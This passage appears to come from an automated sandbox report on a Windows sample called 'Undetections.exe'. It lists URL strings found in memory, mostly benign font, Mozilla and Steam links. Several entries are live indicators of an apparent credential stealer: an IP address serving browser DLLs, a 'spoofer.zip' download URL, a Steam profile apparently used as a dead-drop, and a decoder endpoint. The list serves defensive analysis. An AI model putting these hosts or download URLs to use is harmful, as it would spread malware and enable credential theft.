                          Source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082392228.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/video/
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                          Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.2156275105.000000006F8AD000.00000002.00000001.01000000.00000012.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                          Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2152475889.00000000196ED000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.4.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                          Source: 76561199662282318[1].htm.4.drString found in binary or memory: https://95.217.212.139
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/(
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/4
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/8
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/:
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/EBKJKFIEBGDGDAAECGHDH
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/FIIECBFIDHIJKFBAKEGDG
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/K
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/P~
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/T
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/WinSCP
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/Y
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/e
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/es
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/freebl3.dll
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/mozglue.dll
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/mozglue.dllA
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/msvcp140.dll
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/nss3.dll
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/oaming
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/rPR
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/softokn3.dll
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/softokn3.dll?
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/sqln.dll
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/vcruntime140.dll
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/vcruntime140.dlltx
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139/y
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.13903780ebd6ldb.co_0.indexeddb.leveldbata
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139FHI
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139FIJ
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.212.139IJK
                          Source: EHCBAAAF.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ashjghas.ucoz.net
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ashjghas.ucoz.net/spoofer.zip
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ashjghas.ucoz.net/spoofer.zipd
                          Source: 76561199662282318[1].htm.4.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                          Source: EHCBAAAF.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: EHCBAAAF.4.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: EHCBAAAF.4.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHl
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=KMF8
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englis
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=engli
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=b_Cb-8dXqpFB&amp
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
                          Source: 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&amp;
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=XPgJuNunk65
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.j
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                          Source: Undetections.exeString found in binary or memory: https://communitykeyv1.000webhostapp.com/Decoder4.php?string=
                          Source: Undetections.exeString found in binary or memory: https://discord.gg/tZZe4x6PH6
                          Source: EHCBAAAF.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: EHCBAAAF.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: EHCBAAAF.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: Undetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4110420914.000000000745E000.00000004.00000020.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003AFF000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003AD5000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4108901419.0000000007237000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4107042182.0000000005BF0000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003A61000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fontawesome.com
                          Source: Undetections.exe, 00000000.00000002.4100226337.0000000003A61000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fontawesome.comhttps://fontawesome.comFont
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://help.steampowered.com/en/
                          Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.drString found in binary or memory: https://mozilla.org0/
                          Source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/516730/what-does-the-visual-studio-any-cpu-target-mean&
                          Source: 76561199662282318[1].htm.4.drString found in binary or memory: https://steamcommunity.com/
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://steamcommunity.com/discussions/
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                          Source: 76561199662282318[1].htm.4.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199662282318
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://steamcommunity.com/market/
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                          Source: spoofer.exe, 00000002.00000002.1756042307.0000000004175000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199662282318
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://steamcommunity.com/profiles/76561199662282318/badges
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drString found in binary or memory: https://steamcommunity.com/profiles/76561199662282318/inventory/
